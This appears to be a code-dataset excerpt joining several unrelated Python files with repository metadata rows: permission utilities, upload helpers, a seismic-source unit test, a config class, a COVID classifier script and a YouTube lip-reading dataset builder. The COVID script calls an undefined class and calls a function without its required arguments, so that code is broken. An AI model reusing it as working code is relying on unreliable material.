"Raises exception if path is not valid"
if quietCheckPath(path) is False:
raise Exception("Path [%s] is not valid" % (path))
def quietCheckPath(path):
"Return if path is valid"
return os.path.exists(path)
def createDirIfNeeded(path, perms=None, recursive=False):
"Create a dir with specified permissions if it does not already exist"
# Set function based on recursive parameter
f = os.mkdir
if recursive is True:
f = os.makedirs
# Check if directory or object at path already exists
if os.path.isdir(path):
return
if not os.path.isdir(path) and os.path.exists(path):
raise Exception("Cannot create directory, object at path %s" % (path))
if perms is None:
f(path)
else:
# Set the UID / GID in perms if username / groupname
# passed instead of IDs
setUIDGID(perms)
oldumask = os.umask(0)
# Create the directory
if perms.mode is not None:
f(path, perms.mode)
else:
f(path)
# Set uid and gid
uid = perms.uid
gid = perms.gid
if uid is None:
uid = -1
if gid is None:
gid = -1
os.chown(path, uid, gid)
os.umask(oldumask) # revert back to previous umask
def deleteDirIfExists(path):
"Delete a directory if it exists (no error if it does not exist)"
if quietCheckIsDir(path):
shutil.rmtree(path)
def getUIDGID(username=None, groupname=None):
"Get the UID and GID corresponding with a username and/or groupname"
uid = None
if username is not None:
try:
uid = pwd.getpwnam(username).pw_uid
except KeyError:
raise Exception("Expected user %s does not exist" % (username))
gid = None
if groupname is not None:
try:
gid = grp.getgrnam(groupname).gr_gid
except KeyError:
raise Exception("Expected group %s does not exist" % (groupname))
return uid, gid
def setUIDGID(perms):
"Set perms.uid and .gid only if perms.username / .groupname set"
uid, gid = getUIDGID(perms.username, perms.groupname)
perms.uid = uid
perms.gid = gid
def doDirPermsEqual(path, perms):
"Ask below if the perms are equal, raise exception if they are not..."
if quietDoDirPermsEqual(path, perms) is False:
raise Exception("Insufficient or unexpected permissions for %s "
"or a subdirectory / file\n"
"Expected user = %s, group = %s, (minimum) mode = %s"
% (path, perms.username,
perms.groupname, oct(perms.mode)))
def quietDoDirPermsEqual(path, perms):
"Check if a dir's permissions are equal to the specified values"
# Parent directory first...
if doObjectPermsEqual(path, perms) is False:
return False
# Then recursively checksubdirectories...
if perms.enforceRecursive is True:
for root, dirs, files in os.walk(path):
for momo in dirs:
if doObjectPermsEqual(
os.path.join(
root,
momo),
perms) is False:
return False
for momo in files:
if doObjectPermsEqual(
os.path.join(
root,
momo),
perms) is False:
return False
return True
def doObjectPermsEqual(objectToCheck, perms):
"Compare object's (file / dir) permissions to specified values (with IDs)"
# Set the UID / GID in perms if username / groupname passed instead of IDs
setUIDGID(perms)
# Perform the comparison operation
permsEqual = True
objectStat = os.stat(objectToCheck)
if perms.uid is not None:
permsEqual &= (objectStat.st_uid == perms.uid)
if perms.gid is not None:
permsEqual &= (objectStat.st_gid == perms.gid)
if perms.mode is not None:
if perms.strictMode is None or True:
permsEqual &= (((objectStat.st_mode & 0o777) ^ perms.mode)
& perms.mode) == 0
else:
permsEqual &= (objectStat.st_mode & 0o777) == perms.mode
return permsEqual
def getObjectPerms(objectToInspect):
"Returns an object's (file / dir) permissions"
objectStat = os.stat(objectToInspect)
uid = objectStat.st_uid
gid = objectStat.st_gid
mode = objectStat.st_mode & 0o777
return ObjectPermissions(uid=uid, gid=gid, mode=mode)
# Create & modify directory/file state and permissions
def setDirPerms(path, perms):
"Set a path's permissions to the specified values"
# Parent directory first...
setObjectPerms(path, perms)
# Then, if requested, recursively update subdirectories and files
if perms.enforceRecursive is True:
for root, dirs, files in os.walk(path):
for momo in dirs:
setObjectPerms(os.path.join(root, momo), perms)
for momo in files:
setObjectPerms(os.path.join(root, momo), perms)
def setObjectPerms(objectPath, perms):
"Set an object's permissions to the specified values"
# Set the UID / GID in perms if username / groupname passed instead of IDs
setUIDGID(perms)
# Set an objects's permissions to the specified values (with IDs)
uid = perms.uid
gid = perms.gid
if uid is None:
uid = -1
if gid is None:
gid = -1
os.chown(objectPath, uid, gid)
# Update the mode if needed
if perms.mode is not None:
objectStat = os.stat(objectPath)
# Determine if an update is required
modeOK = False
if perms.strictMode is None or True:
modeOK = (
((objectStat.st_mode & 0o777) ^ perms.mode) & perms.mode) == 0
else:
modeOK = (objectStat.st_mode & 0o777) == perms.mode
# If update required, proceed
if modeOK is False:
os.chmod(objectPath, perms.mode)
def copyTreeToExistingDir(src, dst, symlinks=False, ignore=None):
"Copy the contents of one directory into another (existing) directory"
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
shutil.copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
# Simple Objects #
# Parameter management for global and node specific parameters
class ParamContainer(object):
"""Basic parameter management object that can be used by many nodes.
Used to store configuration for services, where a global service
config exists that can vary on a per node basis..."""
def __init__(self, name, **params):
"""name: name of parameter container
params: parameters to be used for global params"""
self.name = name
self.globalParams = {} # global parameters
self.nodeParams = {} # dict of nodes and their associated parameters
# update global parameters with defaults, then passed parameters
defaultGlobalParams = self.getDefaultGlobalParams()
if defaultGlobalParams is not None:
self.updateGlobalParams(**defaultGlobalParams)
self.updateGlobalParams(**params)
# Handlers for global parameters
def getDefaultGlobalParams(self):
"This is filled in by derived class with default parameters"
return None
def updateGlobalParams(self, **kwargs):
"Update the parameters shared by all nodes (the global parameters)"
self.globalParams.update(kwargs)
def getGlobalParam(self, param, **kwargs):
"Get a service wide default parameter"
if 'defaultValue' in kwargs:
# Return the specified defaultValue if param not set
# kwargs is used as defaultValue could be 'None'
return self.globalParams.get(param, kwargs['defaultValue'])
else:
# Any KeyError exception will need to be handled upstream
return self.globalParams.get(param)
def getGlobalParams(self):
"Get service wide default parameters"
return self.globalParams
# Handlers for node specific parameters
def storeNodeParams(self, node, params, copyDefaults=False):
"""Stores or updates node specific service parameters
If requested, merge the default config with the node's config,
with the node's service config taking priority"""
nodeServiceParams = {}
if copyDefaults is True:
nodeServiceParams = self.globalParams.copy()
if params is not None:
nodeServiceParams.update(params)
# Store parameters structure for future use (uncouples from node)
self.nodeParams[node] = nodeServiceParams
def hasNodeParam(self, node, param):
"Checks whether we have a parameter for a specific node"
return param in self.getNodeParams(node)
def hasNodeParams(self, node):
"Checks whether we have received parameters for a specific node"
return node in self.nodeParams
def getNodeParam(self, node, param, **kwargs):
"Returns a specific parameter from node's parameters for this service"
if 'defaultValue' in kwargs:
# Return the specified defaultValue if param not set
# kwargs is used as defaultValue could be 'None'
return self.getNodeParams(node, kwargs).get(param,
kwargs['defaultValue'])
else:
# Any KeyError exception will need to be handled upstream
return self.getNodeParams(node, kwargs).get(param)
def getNodeParams(self, node, includeGlobals=True, **kwargs):
"Returns structure containing a node's parameters for this service"
if includeGlobals is False and node not in self.nodeParams\
and 'defaultValue' not in kwargs:
raise Exception('ParamContainer %s doesn\'t have params for '
'node %s' % (self.name, node))
nodeServiceParams = {}
if includeGlobals is True:
nodeServiceParams.update(self.globalParams)
if node in self.nodeParams:
nodeServiceParams.update(self.nodeParams[node])
return nodeServiceParams
| 33.350829 | 79 | 0.629173 | 3,883 | 0.321627 | 0 | 0 | 0 | 0 | 0 | 0 | 4,355 | 0.360722 |
634f8edffeec0c94f327111a1a56115127590074 | 2,575 | py | Python | volaupload/utils.py | RealDolos/volaupload | 9705bbc4fcd1dbc59abde092ee48dce1cb0bd3e5 | [
"MIT"
] | 8 | 2017-02-19T00:24:24.000Z | 2021-02-08T23:52:42.000Z | volaupload/utils.py | RealDolos/volaupload | 9705bbc4fcd1dbc59abde092ee48dce1cb0bd3e5 | [
"MIT"
] | 4 | 2015-01-19T08:09:07.000Z | 2018-09-11T21:57:06.000Z | volaupload/utils.py | RealDolos/volaupload | 9705bbc4fcd1dbc59abde092ee48dce1cb0bd3e5 | [
"MIT"
] | 2 | 2015-12-19T11:04:48.000Z | 2017-04-20T12:55:33.000Z | """ RealDolos' funky volafile upload tool"""
# pylint: disable=broad-except
import math
import re
import sys
# pylint: disable=no-name-in-module
try:
from os import posix_fadvise, POSIX_FADV_WILLNEED
except ImportError:
def posix_fadvise(*args, **kw):
"""Mock implementation for systems not supporting it"""
args, kw = args, kw
POSIX_FADV_WILLNEED = 0
# pylint: enable=no-name-in-module
def natsort(val):
"""Returns a tuple from a string that can be used as a sort key for
natural sorting."""
return [int(i) if i.isdigit() else i for i in re.split(r"(\d+)", val)]
def to_name(file):
"""Sortkey by-name"""
return natsort(file.name.casefold()), natsort(file.parent)
def to_path(file):
"""Sortkey by-path"""
return natsort(file.casefold())
def to_size(file):
"""Sortkey by-size"""
return file.size
SORTING = dict(name=to_name,
path=to_path,
size=to_size)
def try_unlink(file):
"""Attempt to unlink a file, or else print an error"""
try:
file.unlink()
except Exception as ex:
print("Failed to delete file after upload: {}, {}".
format(file, ex),
file=sys.stderr, flush=True)
def try_advise(file, offset, length):
"""Try to advise the OS on what file data is needed next"""
try:
if hasattr(file, "fileno"):
posix_fadvise(file.fileno(),
offset,
length,
POSIX_FADV_WILLNEED)
except Exception as ex:
print(ex, file=sys.stderr, flush=True)
def shorten(string, length):
"""Shorten a string to a specific length, cropping in the middle"""
len2 = length // 2
len3 = length - len2 - 1
lens = len(string) + 2
if lens > length:
return ("[\033[32m{}…{}\033[0m]".
format(string[:len2], string[lens - len3:]))
return ("[\033[32m{}\033[0m]{}".
format(string, " " * (length - lens)))
def progressbar(cur, tot, length):
"""Generate a progress bar"""
per = math.floor(cur * float(length) / tot)
return "[{}{}]".format("#" * per, " " * (length - per))
def format_time(secs):
"""Format times for Kokytos"""
m, s = divmod(int(secs), 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
if d:
# Yes, vola is this shit :*(
return "{}::{:02}:{:02}:{:02}".format(d, h, m, s)
if h:
return "{}:{:02}:{:02}".format(h, m, s)
if m:
return "{:02}:{:02}".format(m, s)
return "{}s".format(s)
| 26.010101 | 74 | 0.568155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 802 | 0.311215 |
63530b2bd1708f0bb4a3378fe01c2c5c65a9b0bc | 3,801 | py | Python | openquake/hazardlib/tests/source/non_parametric_test.py | gfzriesgos/shakyground-lfs | 2caf67cc32e6800286eded2df1efb05973ccf41b | [
"BSD-3-Clause"
] | 1 | 2019-08-01T00:28:24.000Z | 2019-08-01T00:28:24.000Z | openquake/hazardlib/tests/source/non_parametric_test.py | gfzriesgos/shakyground-lfs | 2caf67cc32e6800286eded2df1efb05973ccf41b | [
"BSD-3-Clause"
] | 4 | 2018-08-31T14:14:35.000Z | 2021-10-11T12:53:13.000Z | openquake/hazardlib/tests/source/non_parametric_test.py | gfzriesgos/shakyground-lfs | 2caf67cc32e6800286eded2df1efb05973ccf41b | [
"BSD-3-Clause"
] | 3 | 2018-08-31T14:11:00.000Z | 2019-07-17T10:06:02.000Z | # The Hazard Library
# Copyright (C) 2013-2018 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from openquake.hazardlib.source.non_parametric import \
NonParametricSeismicSource
from openquake.hazardlib.source.rupture import BaseRupture, \
NonParametricProbabilisticRupture
from openquake.hazardlib.geo import Point
from openquake.hazardlib.geo.surface.planar import PlanarSurface
from openquake.hazardlib.pmf import PMF
from openquake.hazardlib.tests import assert_pickleable
def make_non_parametric_source():
surf1 = PlanarSurface(
strike=0, dip=90,
top_left=Point(0., -1., 0.), top_right=Point(0., 1., 0.),
bottom_right=Point(0., 1., 10.), bottom_left=Point(0., -1., 10.)
)
surf2 = PlanarSurface(
strike=90., dip=90.,
top_left=Point(-1., 0., 0.), top_right=Point(1., 0., 0.),
bottom_right=Point(1., 0., 10.), bottom_left=Point(-1., 0., 10.)
)
rup1 = BaseRupture(
mag=5., rake=90., tectonic_region_type='ASC',
hypocenter=Point(0., 0., 5.), surface=surf1)
rup2 = BaseRupture(
mag=6, rake=0, tectonic_region_type='ASC',
hypocenter=Point(0., 0., 5.), surface=surf2)
pmf1 = PMF([(0.7, 0), (0.3, 1)])
pmf2 = PMF([(0.7, 0), (0.2, 1), (0.1, 2)])
kwargs = {
'source_id': 'source_id', 'name': 'source name',
'tectonic_region_type': 'tectonic region',
'data': [(rup1, pmf1), (rup2, pmf2)]
}
npss = NonParametricSeismicSource(**kwargs)
assert_pickleable(npss)
return npss, kwargs
class NonParametricSourceTestCase(unittest.TestCase):
def make_non_parametric_source(self):
source, kwargs = make_non_parametric_source()
for key in kwargs:
self.assertIs(getattr(source, key), kwargs[key])
return source, kwargs
def test_creation(self):
self.make_non_parametric_source()
def test_iter_ruptures(self):
source, kwargs = self.make_non_parametric_source()
for i, rup in enumerate(source.iter_ruptures()):
exp_rup, exp_pmf = kwargs['data'][i]
self.assertIsInstance(rup, NonParametricProbabilisticRupture)
self.assertEqual(rup.mag, exp_rup.mag)
self.assertEqual(rup.rake, exp_rup.rake)
self.assertEqual(
rup.tectonic_region_type, source.tectonic_region_type
)
self.assertEqual(rup.hypocenter, exp_rup.hypocenter)
self.assertIsInstance(rup.surface, PlanarSurface)
self.assertEqual(rup.surface.strike, exp_rup.surface.strike)
self.assertEqual(rup.surface.dip, exp_rup.surface.dip)
self.assertEqual(rup.surface.top_left, exp_rup.surface.top_left)
self.assertEqual(rup.surface.top_right, exp_rup.surface.top_right)
self.assertEqual(
rup.surface.bottom_right, exp_rup.surface.bottom_right)
numpy.testing.assert_allclose(
rup.pmf, [prob for prob, occ in exp_pmf.data])
def test_count_ruptures(self):
source, _ = self.make_non_parametric_source()
self.assertEqual(source.count_ruptures(), 2)
| 40.43617 | 78 | 0.675612 | 1,606 | 0.42252 | 0 | 0 | 0 | 0 | 0 | 0 | 806 | 0.212049 |
6353fd03f408a3e420c9272508ec8a75165d4ec5 | 2,395 | py | Python | tmc/config.py | jgke/tmc.py | a061d199ecce0274c1fa554fb065e13647d9862b | [
"MIT"
] | null | null | null | tmc/config.py | jgke/tmc.py | a061d199ecce0274c1fa554fb065e13647d9862b | [
"MIT"
] | null | null | null | tmc/config.py | jgke/tmc.py | a061d199ecce0274c1fa554fb065e13647d9862b | [
"MIT"
] | null | null | null | import os
from os import path, environ
from configparser import ConfigParser
from collections import OrderedDict
class Config(object):
"""
This class will take care of ConfigParser and writing / reading the
configuration.
TODO: What to do when there are more variables to be configured? Should we
overwrite the users config file with the updated variables if the file is
lacking?
"""
config = None
filename = ""
defaults = None
def __init__(self):
default_path = path.join(path.expanduser("~"), ".config", "tmc.ini")
config_filepath = environ.get("TMC_CONFIGFILE", default_path)
super().__setattr__('filename', config_filepath)
super().__setattr__('config', ConfigParser())
self._update_defaults()
self.config["CONFIGURATION"] = {}
for i in self.defaults:
self.config["CONFIGURATION"][i] = str(self.defaults[i])
if self._exists():
self._load()
self._write()
def _update_defaults(self):
defaults = OrderedDict()
if os.name == "nt":
defaults["use_unicode_characters"] = False
defaults["use_ansi_colors"] = False
else:
defaults["use_unicode_characters"] = True
defaults["use_ansi_colors"] = True
defaults["tests_show_trace"] = False
defaults["tests_show_partial_trace"] = False
defaults["tests_show_time"] = True
defaults["tests_show_successful"] = True
super().__setattr__('defaults', defaults)
def _exists(self):
return path.isfile(self.filename)
def _write(self):
d = os.path.dirname(self.filename)
if not os.path.exists(d):
os.makedirs(d)
with open(self.filename, "w") as fp:
self.config.write(fp)
def _load(self):
with open(self.filename, "r") as fp:
self.config.read_file(fp)
for i in self.config["CONFIGURATION"]:
if i not in self.defaults:
print("Warning: unknown configuration option: " + i)
def __getattr__(self, name):
if isinstance(self.defaults.get(name), bool):
return self.config["CONFIGURATION"].getboolean(name)
return self.config["CONFIGURATION"].get(name)
def __setattr__(self, name, value):
self.config["CONFIGURATION"][name] = str(value)
| 31.513158 | 78 | 0.622547 | 2,278 | 0.951148 | 0 | 0 | 0 | 0 | 0 | 0 | 647 | 0.270146 |
635559b738e5f1db17c5a1b948064af180ddd5b4 | 819 | py | Python | code/main.py | RoshanTanisha/covid19 | cdea60b84b2232e84efa0803a9b633d938247590 | [
"MIT"
] | 1 | 2020-05-20T03:47:01.000Z | 2020-05-20T03:47:01.000Z | code/main.py | RoshanTanisha/covid19 | cdea60b84b2232e84efa0803a9b633d938247590 | [
"MIT"
] | null | null | null | code/main.py | RoshanTanisha/covid19 | cdea60b84b2232e84efa0803a9b633d938247590 | [
"MIT"
] | null | null | null | import h5py
import numpy as np
from code.model import UNetClassifier
def load_dataset(covid_file_path, normal_file_path):
covid = h5py.File(covid_file_path, 'r')['covid']
normal = h5py.File(normal_file_path, 'r')['normal']
all_images = np.expand_dims(np.concatenate([covid, normal]), axis=3)
all_labels = np.concatenate([[1]*covid.shape[0], [0]*normal.shape[0]])
shuffled_indices = np.random.permutation(np.arange(all_images.shape[0]))
all_images = all_images[shuffled_indices]
all_labels = all_labels[shuffled_indices]
return all_images, all_labels
if __name__ == '__main__':
model = Classifier((512, 512, 1), 2, True)
all_images, all_labels = load_dataset()
print(all_images.shape, all_labels.shape)
model.train(all_images, all_labels, 15, 16, 0.2)
| 27.3 | 76 | 0.708181 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 31 | 0.037851 |
6355c736188798e18f8ebe25d3c958a69c9cea68 | 54,947 | py | Python | main.py | openmindednewby/Tool-for-creating-lip-recognition-datasets | d8bd97cfa112e8e2fb1f4cca20a7093493e3ed9d | [
"MIT"
] | 4 | 2020-07-22T16:10:55.000Z | 2021-11-25T08:32:34.000Z | main.py | openmindednewby/Tool-for-creating-lip-recognition-datasets | d8bd97cfa112e8e2fb1f4cca20a7093493e3ed9d | [
"MIT"
] | null | null | null | main.py | openmindednewby/Tool-for-creating-lip-recognition-datasets | d8bd97cfa112e8e2fb1f4cca20a7093493e3ed9d | [
"MIT"
] | 2 | 2020-12-30T22:07:54.000Z | 2021-02-02T01:12:13.000Z | ''' Every type you encounter ##EDIT_ME## you will need to adjust these settings '''
import pandas as pd
import numpy as np
import module_youtube_extract
import module_convert_audio_to_wav
import module_process_subtitles
import module_save_variables
import module_video_processing
import module_sample_name
import module_face_detection
##EDIT_ME##
#---
# tested and work wihtought any changes to the code
INPUT_URL = 'https://www.youtube.com/watch?v=6cXdS_qVfUc'
#INPUT_URL = 'https://www.youtube.com/watch?v=v2Q3eoUldcE'
#INPUT_URL = 'https://www.youtube.com/watch?v=kayOhGRcNt4'
#INPUT_URL = 'https://www.youtube.com/watch?v=YHCZt8LeQzI&fbclid=IwAR2e436VcxEBWWnnz48W2vPU4iTfFpxgglA9U7uIOFP1XCA1sdp4h_qnmLI'
#INPUT_URL = 'https://www.youtube.com/watch?v=a1Kxhhmqt8U'
#INPUT_URL = 'https://www.youtube.com/watch?v=dRFbwjwQ4VE'
#INPUT_URL = 'https://www.youtube.com/watch?v=PpV_5-tCS-c'
#INPUT_URL = 'https://www.youtube.com/watch?v=DhYeqgufYss'
#INPUT_URL = 'https://www.youtube.com/watch?v=HqI0jbKGaT8&pbjreload=10'
#INPUT_URL = 'https://www.youtube.com/watch?v=kR-WCDa4NSc'
#INPUT_URL = 'https://www.youtube.com/watch?v=PjQ-AfRNG18'
#INPUT_URL = 'https://www.youtube.com/watch?v=PACH0XKozuU'
#INPUT_URL = 'https://www.youtube.com/watch?v=ie6lRKAdvuY'
#INPUT_URL = 'https://www.youtube.com/watch?v=w2PQEzDawMw'
#INPUT_URL = 'https://www.youtube.com/watch?v=5v-wyR5emRw'
#INPUT_URL = 'https://www.youtube.com/watch?v=MmFuWmzeiDs'
#INPUT_URL = 'https://www.youtube.com/watch?v=3obig1XeOlw'
#INPUT_URL = 'https://www.youtube.com/watch?v=Xdzo2dVqNH0'
#INPUT_URL = 'https://www.youtube.com/watch?v=m8ZUvBeKZEY'
#INPUT_URL = 'https://www.youtube.com/watch?v=uiU5GutVms4'
# settings or the code need editting
##INPUT_URL = 'https://www.youtube.com/watch?v=ZTK8XJUXqy8'
##INPUT_URL = 'https://www.youtube.com/watch?v=1mHjMNZZvFo'
##INPUT_URL = 'https://www.youtube.com/watch?v=ZO44B271tfk'
##INPUT_URL= 'https://www.youtube.com/watch?v=z0hrMg1j_d4'
##INPUT_URL= 'https://www.youtube.com/watch?v=aeT3YOYsvMs'
#---
#FILE_NAME
# download everithing into a new folder just add folder_name/file_name
# to avioid errors and extra work make sure that the variables created do not contain special characters or spaces
#-2
# It is recomaneded that the folder in which all the information for each video is created first as some functions produce errors if it does not presxists.
# This generates a random string which will be assigned to the the function which creates a file
random_string_INPUT = str(module_sample_name.passw_gen(MODE=0, LENGTH=3))
# Optional
# You can spcify the exact folder path or name that you would like everithing to be downloaded and storded in simply assing the directory name to random_string_INPUT
# Example
#random_string_INPUT = '/media/username/name_of_storage_device/Folder-name'
#-1
#FOLDER_PATH = str('a')
FOLDER_PATH = module_sample_name.folder_gen(RANDOM_STRING = random_string_INPUT, FILE_PERMISION = '777')
##EDIT_ME##
# avoid special characters appart from _ and remember to add / before the actual name
# Work fine
NNAME = '/Donald Trump suspends US travel from 26 European countries but not the UK to fight coronavirus'
#NNAME = '/Moving to the UK to study Finnish Girls Experience'
#NNAME = '/Tell Me About Yourself - A Good Answer to This Interview Question'
#NNAME = '/CYPRUS the IRELAND of the MEDITERRANEAN VisualPolitik EN'
#NNAME = '/Race to become UK PM Boris Johnson exclusive interview BBC News'
#NNAME = '/Coronavirus V Last Week Tonight with John Oliver'
#NNAME = '/Trump Attacks the WHO Kellyanne Cant Count to COVID 19 The Daily Social Distancing Show'
#NNAME = '/VPNs or Virtual Private Networks as Fast As Possible'
#NNAME = '/John McAfee and the FBI Finally Face Off On CNN CNN Interview'
#NNAME = '/McAfee to CIA You Should Be Ashamed What Were You Thinking' # failed due to youtube-dl
#NNAME = '/John McAfee Im Behind Edward Snowden'
#NNAME = '/Edward Snowden I know how to keep a secret BBC News'
#NNAME = '/Coronavirus: Bill Gates interview '
#NNAME = '/Atlanta mayor Im at a loss by governors decision to reopen' # works simply there are no subtitles for this particular video
#NNAME = '/Tell Me About Yourself A Good Answer To This Interview Question'
#NNAME = '/How to Answer Tell Me About Yourself'
#NNAME = '/Ken Jeong Answers More Medical Questions From Twitter Tech Support WIRED'
#NNAME = '/body hair tips from a ballerina'
#NNAME = '/CompTIA IT Fundamentals FC0-U61 Exam Prep Intro Free Course from ITProTV'
#NNAME = '/How To Pass CompTIA Exams'
# settings or the code need editting
##NNAME = '/FACEBOOK BANS CORONAVIRUS PROTESTS'
##NNAME = '/08 common Interview question and answers Job Interview Skills'
##NNAME = '/Pence on the federal roadmap to restart the economy'
##NNAME = '/Give Donald Trump A Radio Briefings'
##NNAME = '/Trump Blames WHO and Rushes to Open Up America Again A Closer Look'
# remove any spaces if they exists in the path as that may introduce errors. Note_if there are space0 or in the absolute directory path, this might introduce errors.
NNAME = NNAME.replace(' ', '_')
INPUT_FILE_NAME=str(FOLDER_PATH) + NNAME
#0
# get a video meta data
#meta_data = module_youtube_extract.meta_data(URL = INPUT_URL, FILE_NAME = INPUT_FILE_NAME , TXT_CLEAN=True, TXT=True, JSON=True, DOWNLOAD=False)
#1
# get all available downloadble formats
available_formats = module_youtube_extract.list_available_AV_formats(URL = INPUT_URL, CLEAN=True, LIST=True, SAVE=True, FILE_NAME = INPUT_FILE_NAME+'_down_formats')
#2 # require stable internet connection
# download audio visual content. Note it has been observed that when some of codes are used even thought they are specified as pure video codes they also contain embeded audio such as code 22. There for an additional function is needed to remove the audio.
module_youtube_extract.down_audio_video(URL = INPUT_URL, VIDEO_QUALITY_CODE=22, AUDIO_QUALITY_CODE=140 , MERGE=False, FILE_NAME = INPUT_FILE_NAME)
#7
# Convert m4a into wav file
# converts anything with the FORMAT_FROM in the given directory to .wav file
#module_convert_audio_to_wav.dir_conversion_to_wav(FORMAT_FROM='.m4a', DIRECTORY='data/')
# converts simple files OPTINAL
module_convert_audio_to_wav.file_conversion_to_wav(FORMAT_FROM='.m4a', FILE_NAME=INPUT_FILE_NAME, BIT_RATE='192k')
whole_pure_audio_file_name_dir = INPUT_FILE_NAME + '.wav'
#8
#Convert mp4 to mkv format as this elliminates errors in the segmentatio of the videos later on
video_converted_to_mkv = module_video_processing.convert_from_mp4_to_mkv(FILE_NAME=INPUT_FILE_NAME, INPUT_EXTENSION='.mp4', OUTPUT_EXTENSION = '.mkv')
#9 OPTIONAL
# remove the audio from the mp4 file https://unix.stackexchange.com/questions/6402/how-to-remove-an-audio-track-from-an-mp4-video-file
# for single file
module_video_processing.remove_audio_from_file_mp4(FILE_NAME=INPUT_FILE_NAME, EXTENSION = '.mp4')
#10 OPTINAL
#Convert mp4 to mkv format as this elliminates errors in the segmentatio of the videos later on for the none_audio_ video
video_converted_to_mkv_none_audio = module_video_processing.convert_from_mp4_to_mkv(FILE_NAME=INPUT_FILE_NAME+'_none_audio', INPUT_EXTENSION='.mp4', OUTPUT_EXTENSION = '.mkv')
#3
# Checks to see what subtitles are available and in what format (ex. timings are for every word or)
string_subtitle_formats, manual_subtitles_exist, automatic_subtitles_exist = module_youtube_extract.list_available_subtitles(URL = INPUT_URL, FILE_NAME = INPUT_FILE_NAME, TXT_CLEAN=False, TXT=False, JSON=False)
#4
# downlaods the subtitles
man_sub_var, auto_sub_var = module_youtube_extract.down_sub(URL = INPUT_URL, FILE_NAME=INPUT_FILE_NAME+'SUBTITLES', TYPE='vtt', LANGUAGE='en', MAN_SUB = manual_subtitles_exist, AUTO_SUB = automatic_subtitles_exist, SAVE=True)
#5
# Identify what type of subtitles they are, if they contain contain timings per word or per sentence
man_sub_easy_type, auto_sub_easy_type = module_youtube_extract.sub_type(MAN_SUB = man_sub_var, AUTO_SUB = auto_sub_var, MAN_SUB_EXIST = manual_subtitles_exist, AUTO_SUB_EXIST = automatic_subtitles_exist)
#6
# process the subtitles into an easy to read and process lists which will contain the subtitles and the other the timeings they are presented in the video. Note: if timings are alocated per word which is due to the auto sub gen of Youtube, we will not allign our subtitles to the text as that has been already done. This function takes care of all 3 cases as inputs (no subtitles, sub aligned per sentence, sub aligned per word) for auto and man sub()
'''
acpwe #auto_content_per_word_easy
atpwe #auto_time_per_word_easy
mcpwe #man_content_per_word_easy
mtpwe #man_time_per_word_easy
acpse #auto_content_per_sentence_easy
atpse #auto_time_per_sentence_easy
acpsh #auto_content_per_sentence_hard
atpsh #auto_time_per_sentence_hard
mcpse #man_content_per_sentence_easy
mtpse #man_time_per_sentence_easy
mcpsh #man_content_per_sentence_hard
mtpsh #man_time_per_sentence_hard
'''
# takes input values from #5 #4 #3
acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh = module_process_subtitles.format_sub(MAN_SUB_EXIST = manual_subtitles_exist, AUTO_SUB_EXIST = automatic_subtitles_exist, MAN_SUB_EASY_TYPE = man_sub_easy_type, AUTO_SUB_EASY_TYPE = auto_sub_easy_type, MAN_SUB = man_sub_var, AUTO_SUB = auto_sub_var)
video_converted_to_mkv_none_audio_no_extension = video_converted_to_mkv_none_audio.replace('.mkv','')
video_converted_to_mkv_none_audio_no_extension = list(video_converted_to_mkv_none_audio_no_extension)
##EDIT_ME##
# adjust the following variables
# Controll chopping properties on acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh for all chopped samples.
# This values are feed into module_video_processing.chop_video_per_word_or_sentence
# in milliseconds
shift_right_or_left_acpwe = 0
shift_right_or_left_mcpwe = 0
shift_right_or_left_acpse = 0
shift_right_or_left_acpsh = 0
shift_right_or_left_mcpse = 0
shift_right_or_left_mcpsh = 0
# in milliseconds extend left
extend_left_acpwe = -150
extend_left_mcpwe = -150
extend_left_acpse = -150
extend_left_acpsh = -150
extend_left_mcpse = -150
extend_left_mcpsh = -150
# in milliseconds extend right
extend_right_acpwe = 150
extend_right_mcpwe = 150
extend_right_acpse = 150
extend_right_acpsh = 150
extend_right_mcpse = 150
extend_right_mcpsh = 150
# start word or sentence index from acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh
start_index_acpwe = 0
start_index_mcpwe = 0
start_index_acpse = 0
start_index_acpsh = 0
start_index_mcpse = 0
start_index_mcpsh = 0
# stop word or sentence index from acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh
stop_index_acpwe = 5 # 'END' # Does the whole video
stop_index_mcpwe = 5
stop_index_acpse = 5
stop_index_acpsh = 5
stop_index_mcpse = 5
stop_index_mcpsh = 5
#12
# Fixed and necessary step
# get the maximum time of the video
max_time = module_video_processing.maximum_time_of_vid(ATPSE=atpse, MTPSE=mtpse, AUTO=automatic_subtitles_exist, MAN=manual_subtitles_exist)
if max_time == None:
max_time = module_video_processing.maximum_time_of_vid(ATPSE=atpsh, MTPSE=mtpsh, AUTO=automatic_subtitles_exist, MAN=manual_subtitles_exist)
else:
pass
'''
#12
# Fixed and necessary step
# get the maximum time of the video
max_time = module_video_processing.maximum_time_of_vid(ATPSE=atpse, MTPSE=mtpse, AUTO=True, MAN=False)
if max_time == None:
max_time = module_video_processing.maximum_time_of_vid(ATPSE=atpsh, MTPSE=mtpsh, AUTO=True, MAN=False)
else:
pass
'''
if (acpwe == None or acpwe == [] or atpwe == None or atpwe == []):
word_chunk_samples_info_acpwe = None
chopped_sample_per_word_folder_dir_acpwe = None
chopped_sample_per_word_folder_dir_pure_audio_acpwe = None
chopped_sample_per_word_folder_dir_pure_video_acpwe = None
else:
#7 OPTIONAL
